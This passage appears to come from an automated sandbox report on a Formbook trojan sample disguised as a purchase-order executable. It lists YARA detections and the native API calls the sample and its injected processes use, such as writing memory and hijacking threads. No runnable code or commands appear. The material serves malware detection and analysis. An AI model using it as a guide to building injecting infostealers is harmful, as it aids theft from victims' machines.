            Source: Yara match File source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0037C863 NtClose, 1_2_0037C863
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003519A7 NtProtectVirtualMemory, 1_2_003519A7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00351A33 NtProtectVirtualMemory, 1_2_00351A33
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B60 NtClose,LdrInitializeThunk, 1_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk, 1_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074340 NtSetContextThread, 1_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074650 NtSuspendThread, 1_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B80 NtQueryInformationFile, 1_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BA0 NtEnumerateValueKey, 1_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BE0 NtQueryValueKey, 1_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BF0 NtAllocateVirtualMemory, 1_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AB0 NtWaitForSingleObject, 1_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AD0 NtReadFile, 1_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AF0 NtWriteFile, 1_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F30 NtCreateSection, 1_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F60 NtCreateProcessEx, 1_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F90 NtProtectVirtualMemory, 1_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FA0 NtQuerySection, 1_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FB0 NtResumeThread, 1_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FE0 NtCreateFile, 1_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E30 NtWriteVirtualMemory, 1_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E80 NtReadVirtualMemory, 1_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EA0 NtAdjustPrivilegesToken, 1_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EE0 NtQueueApcThread, 1_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D00 NtSetInformationFile, 1_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D10 NtMapViewOfSection, 1_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D30 NtUnmapViewOfSection, 1_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DB0 NtEnumerateKey, 1_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DD0 NtDelayExecution, 1_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C00 NtQueryInformationProcess, 1_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C60 NtCreateKey, 1_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C70 NtFreeVirtualMemory, 1_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CA0 NtQueryInformationToken, 1_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CC0 NtQueryVirtualMemory, 1_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CF0 NtOpenProcess, 1_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073010 NtOpenDirectoryObject, 1_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073090 NtSetValueKey, 1_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030739B0 NtGetContextThread, 1_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D10 NtOpenProcessToken, 1_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D70 NtOpenThread, 1_2_03073D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F74340 NtSetContextThread,LdrInitializeThunk, 3_2_02F74340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F74650 NtSuspendThread,LdrInitializeThunk, 3_2_02F74650
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72AF0 NtWriteFile,LdrInitializeThunk, 3_2_02F72AF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72AD0 NtReadFile,LdrInitializeThunk, 3_2_02F72AD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_02F72BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72BE0 NtQueryValueKey,LdrInitializeThunk, 3_2_02F72BE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72BA0 NtEnumerateValueKey,LdrInitializeThunk, 3_2_02F72BA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72B60 NtClose,LdrInitializeThunk, 3_2_02F72B60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72EE0 NtQueueApcThread,LdrInitializeThunk, 3_2_02F72EE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk, 3_2_02F72E80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72FE0 NtCreateFile,LdrInitializeThunk, 3_2_02F72FE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72FB0 NtResumeThread,LdrInitializeThunk, 3_2_02F72FB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72F30 NtCreateSection,LdrInitializeThunk, 3_2_02F72F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk, 3_2_02F72CA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_02F72C70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72C60 NtCreateKey,LdrInitializeThunk, 3_2_02F72C60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk, 3_2_02F72DF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72DD0 NtDelayExecution,LdrInitializeThunk, 3_2_02F72DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_02F72D30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk, 3_2_02F72D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F735C0 NtCreateMutant,LdrInitializeThunk, 3_2_02F735C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F739B0 NtGetContextThread,LdrInitializeThunk, 3_2_02F739B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72AB0 NtWaitForSingleObject, 3_2_02F72AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72B80 NtQueryInformationFile, 3_2_02F72B80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72EA0 NtAdjustPrivilegesToken, 3_2_02F72EA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72E30 NtWriteVirtualMemory, 3_2_02F72E30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72FA0 NtQuerySection, 3_2_02F72FA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72F90 NtProtectVirtualMemory, 3_2_02F72F90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72F60 NtCreateProcessEx, 3_2_02F72F60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72CF0 NtOpenProcess, 3_2_02F72CF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72CC0 NtQueryVirtualMemory, 3_2_02F72CC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72C00 NtQueryInformationProcess, 3_2_02F72C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72DB0 NtEnumerateKey, 3_2_02F72DB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F72D00 NtSetInformationFile, 3_2_02F72D00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F73090 NtSetValueKey, 3_2_02F73090
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F73010 NtOpenDirectoryObject, 3_2_02F73010
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F73D70 NtOpenThread, 3_2_02F73D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F73D10 NtOpenProcessToken, 3_2_02F73D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_025B8F30 NtReadFile, 3_2_025B8F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_025B8DD0 NtCreateFile, 3_2_025B8DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_025B9220 NtAllocateVirtualMemory, 3_2_025B9220
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_025B9020 NtDeleteFile, 3_2_025B9020
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_025B90C0 NtClose, 3_2_025B90C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02D9F13A NtQueryInformationProcess, 3_2_02D9F13A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002F702F: CreateFileW,DeviceIoControl,CloseHandle, 0_2_002F702F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002EB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_002EB9F1
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002F82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_002F82D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002DBDF6 0_2_002DBDF6
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002BA0C0 0_2_002BA0C0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D0183 0_2_002D0183
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002F220C 0_2_002F220C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B8530 0_2_002B8530
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D0677 0_2_002D0677
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B6670 0_2_002B6670
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E8779 0_2_002E8779
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_0031A8DC 0_2_0031A8DC
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D0A8F 0_2_002D0A8F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B6BBC 0_2_002B6BBC
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B8CA0 0_2_002B8CA0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002DAC83 0_2_002DAC83
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002CAD5C 0_2_002CAD5C
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E4EBF 0_2_002E4EBF
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D0EC4 0_2_002D0EC4
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_003130AD 0_2_003130AD
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E113E 0_2_002E113E
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D12F9 0_2_002D12F9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E542F 0_2_002E542F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_0031F5D0 0_2_0031F5D0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002C3680 0_2_002C3680
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E599F 0_2_002E599F
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002DDA74 0_2_002DDA74
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002BDCD0 0_2_002BDCD0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B5D32 0_2_002B5D32
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002BBDF0 0_2_002BBDF0
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002D1E5A 0_2_002D1E5A
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B9EC9 0_2_002B9EC9
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002DDF69 0_2_002DDF69
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002FBFB8 0_2_002FBFB8
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002E7FFD 0_2_002E7FFD
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_03BC3600 0_2_03BC3600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00368913 1_2_00368913
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003519A7 1_2_003519A7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003511F0 1_2_003511F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003601D3 1_2_003601D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003601CA 1_2_003601CA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00366AE3 1_2_00366AE3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00366ADE 1_2_00366ADE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00352B20 1_2_00352B20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00352B1D 1_2_00352B1D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_003603F3 1_2_003603F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0035E473 1_2_0035E473
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00353520 1_2_00353520
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00353516 1_2_00353516
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0037EE63 1_2_0037EE63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00352700 1_2_00352700
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FA352 1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E3F0 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031003E6 1_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C02C0 1_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030100 1_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C8158 1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F41A2 1_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031001AA 1_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F81CC 1_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03064750 1_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040770 1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303C7C0 1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305C6E0 1_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040535 1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03100591 1_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E4420 1_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F2446 1_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EE4F6 1_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FAB40 1_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F6BD7 1_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303EA80 1_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03056962 1_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030429A0 1_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310A9A6 1_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304A840 1_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03042840 1_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030268B8 1_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306E8F0 1_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03082F28 1_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03060F30 1_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E2F30 1_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B4F40 1_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BEFA0 1_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03032FC8 1_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FEE26 1_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040E59 1_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052E90 1_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FCE93 1_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FEEDB 1_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304AD00 1_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DCD1F 1_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03058DBF 1_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303ADE0 1_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03040C00 1_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0CB5 1_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030CF2 1_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F132D 1_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302D34C 1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308739A 1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030452A0 1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305B2C0 1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E12ED 1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305D2F0 1_2_0305D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307516C 1_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302F172 1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310B16B 1_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304B1B0 1_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EF0CC 1_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030470C0 1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F70E9 1_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF0E0 1_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF7B0 1_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03085630 1_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F16CC 1_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7571 1_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DD5B0 1_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031095C3 1_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FF43F 1_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03031460 1_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFB76 1_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305FB80 1_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B5BF0 1_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307DBF9 1_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFA49 1_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7A46 1_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B3A6C 1_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DDAAC 1_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03085AA0 1_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E1AA3 1_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EDAC6 1_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D5910 1_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03049950 1_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305B950 1_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AD800 1_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030438E0 1_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFF09 1_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03041F92 1_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFFB1 1_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03003FD2 1_2_03003FD2
